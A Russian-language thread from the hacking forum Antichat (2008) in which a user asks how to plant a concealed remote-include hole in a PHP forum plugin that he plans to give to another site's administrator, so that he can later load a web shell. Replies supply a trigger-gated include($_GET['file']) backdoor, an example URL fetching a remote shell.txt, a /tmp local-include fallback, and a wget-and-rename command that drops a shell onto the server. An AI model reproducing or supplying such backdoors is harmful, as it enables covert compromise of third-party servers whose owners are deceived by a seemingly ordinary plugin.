Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

30.03.2008, 07:14
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме: 54867
Репутация:
5
|
|
У меня есть php скрипт, мне в нем надо сделать что-то тиап уязвимости, т.е. я мог вызвать через этот скрипт шелл:
например: www.site.com/script.php?shell=[shell-adress]
|
|
|

30.03.2008, 09:13
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме: 54867
Репутация:
5
|
|
Сообщение от [x26]VOLAND
PHP код:
...
$shell = @$_GET['shell'];
include($shell);
...
так не идет...
мне не надо чтобы скрипт постояно инклудил, а когда мне нужно, а то если переменная shell не задана, то вываливает ошибка.
|
|
|

30.03.2008, 09:27
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
вставляешь в страницу вот это
if(@$_GET["hack"] == "yes") include($_GET['file']);
а вызываешь вот так
http://site.ru/index.php?hack=yes&file=http://site.ru/shell.txt
|
|
|

30.03.2008, 09:43
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме: 54867
Репутация:
5
|
|
Warning: include() [function.include]: URL file-access is disabled in the server configuration
Вот такую ошибку нельзя обойти или это только в конфигах меняется?
|
|
|

30.03.2008, 10:06
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме: 54867
Репутация:
5
|
|
Сообщение от [x26]VOLAND
Вот теперь понятно. В настройках PHP отключена опция allow_url_include
Обойти её в большинстве случев нельзя, надо просить хостера включить (сам просил, всегда прокатывало).
это что при выключенном параметре, невозможен php-инклудинг?
З.Ы. я этот скрипт хочу не себе поставить, поэтому я должен быть готов на все случаи жизни=), шелл я подсунуть не могу уж слишком он громоздкий, спалят...
Последний раз редактировалось QZAR-X; 30.03.2008 в 10:10..
|
|
|

30.03.2008, 10:11
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
да невозможен и ничего ты несделаешь с удаленного сервера шел не приинклудишь а вот с того сервера котором ты находится должен смоч приинклудить попробуй с локального сервера шел приинклудить.
Попробуй залить в папку /tmp шел а потом вставь в скрипт что то типо этого
<?
include ("/tmp/shell.txt")
?>
Последний раз редактировалось heks; 30.03.2008 в 10:14..
|
|
|

30.03.2008, 10:17
|
|
Новичок
Регистрация: 14.02.2008
Сообщений: 13
Провел на форуме: 54867
Репутация:
5
|
|
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?
А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php
Последний раз редактировалось QZAR-X; 30.03.2008 в 10:26..
|
|
|

30.03.2008, 10:49
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
Сообщение от QZAR-X
я щас экспрементирую на своем компе, а я хочу админу одного сайта дать плагин для forum'a в котором будет удаленный инклуд. Я незнаю разрешено ли на том серваке по url инклудить, поэтому отрабатываю разные случаи.
Тогда можно ли сделать, коммандой 1.php?shell=conf.php, файл(локальный) просто прочитался или скачался?
А можно чтобы вместо инклуда, была заливка файла на сервер и вызов был примерно таков:
index.php?hack=yes&upload=shell.php
встрой туда что я тебе сказал и все будет возможно использовать можно будет какой либо качалкой залить с удаленного сайта шел примерно так сам точно незнаю скрипт в котором это было где то есть но я непомню где ;(
wget http://site.ru/shell.txt;mv shell.txt shell.php но дира должна быть доступна для записи
|
|
|

30.03.2008, 10:50
|
|
Новичок
Регистрация: 28.03.2008
Сообщений: 24
Провел на форуме: 52770
Репутация:
-5
|
|
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
|
|
|

30.03.2008, 10:58
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме: 1484154
Репутация:
126
|
|
Сообщение от azote
Может поможет мне ктонить? А? Мой пост несколько страниц назад...
сразу сказать на какой странице твой пост нельзя у лююдей траф не резиновый непроше юзать шел который скачивае или отправляет шел по почте ?
Последний раз редактировалось heks; 30.03.2008 в 11:02..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|